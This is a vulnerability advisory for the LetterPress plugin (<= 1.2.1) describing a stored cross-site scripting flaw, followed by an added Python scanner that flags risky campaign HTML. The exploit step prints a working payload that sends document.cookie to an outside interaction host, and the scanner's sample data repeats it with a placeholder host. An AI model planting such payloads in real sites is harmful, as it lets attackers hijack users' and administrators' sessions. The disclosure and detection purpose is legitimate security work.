P.L.SANU

Cyber Security Engineer

Information Security Analyst

Security Researcher

Full Stack Developer

LetterPress <= 1.2.1 – Cookie Stealing Vulnerability

Exploit Title: LetterPress <= 1.2.1 – Cookie Stealing Vulnerability
Exploit Author: P.L.Sanu
CVE:
CVSS:
References: https://github.com/plsanu/LetterPress-1.2.1-Cookie-Stealing-Vulnerability

Description:
The LetterPress plugin <= 1.2.1 is vulnerable to cookie stealing. An attacker is able to steal cookies by injecting JavaScript code.

Exploit:
1. In the LetterPress plugin, navigate to Add Campaign, insert the code “<img src=x onerror="location.href='https://masdctnkppwsmnzsddestjmlhih74l9tt.oast.fun?c='+ document.cookie">” in the HTML Campaign Message input field, and click Save Campaign.
2. View the campaign and monitor the requests and responses on a third-party site (e.g. Burp Collaborator).
3. The cookie values are passed in a GET parameter to the third-party site.
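
A defender-side check for the issue described above, as an added example that is not part of the original advisory or the plugin's code: it scans stored campaign HTML for inline event handlers and other script-capable markup. The function and class names, the sample rows and the host collector.example are assumptions made for illustration.

```python
from html.parser import HTMLParser

# Attributes that take a URL and can carry a javascript: scheme.
URL_ATTRS = {"href", "src", "action", "formaction"}
# Elements that execute or embed active content.
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}


class CampaignAuditor(HTMLParser):
    """Collects script-capable constructs found in stored campaign HTML."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append((tag, None, "active element"))
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):
                # Conservative: any attribute starting with "on" is treated
                # as an inline event handler (onerror=, onload=, ...).
                note = "event handler"
                if "document.cookie" in value.replace(" ", ""):
                    note += " reading document.cookie"
                self.findings.append((tag, name, note))
            elif name in URL_ATTRS:
                # Browsers ignore whitespace and control characters here.
                scheme = "".join(c for c in value if c > " ").lower()
                if scheme.startswith("javascript:"):
                    self.findings.append((tag, name, "javascript: URL"))


def audit_campaign_html(message):
    """Return (tag, attribute, note) tuples for one campaign message."""
    auditor = CampaignAuditor()
    auditor.feed(message)
    auditor.close()
    return auditor.findings


# Constructed sample rows; collector.example is a placeholder host.
SAMPLES = {
    1: "<h1>Spring sale</h1><p>Visit <a href='https://shop.example/'>us</a></p>",
    2: "<img src=x onerror=\"location.href='https://collector.example/?c='+ document.cookie\">",
}

if __name__ == "__main__":
    for campaign_id, html in SAMPLES.items():
        print(campaign_id, audit_campaign_html(html))
```

A non-empty result for a campaign means its HTML Campaign Message should be reviewed before anyone views it in an authenticated session.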
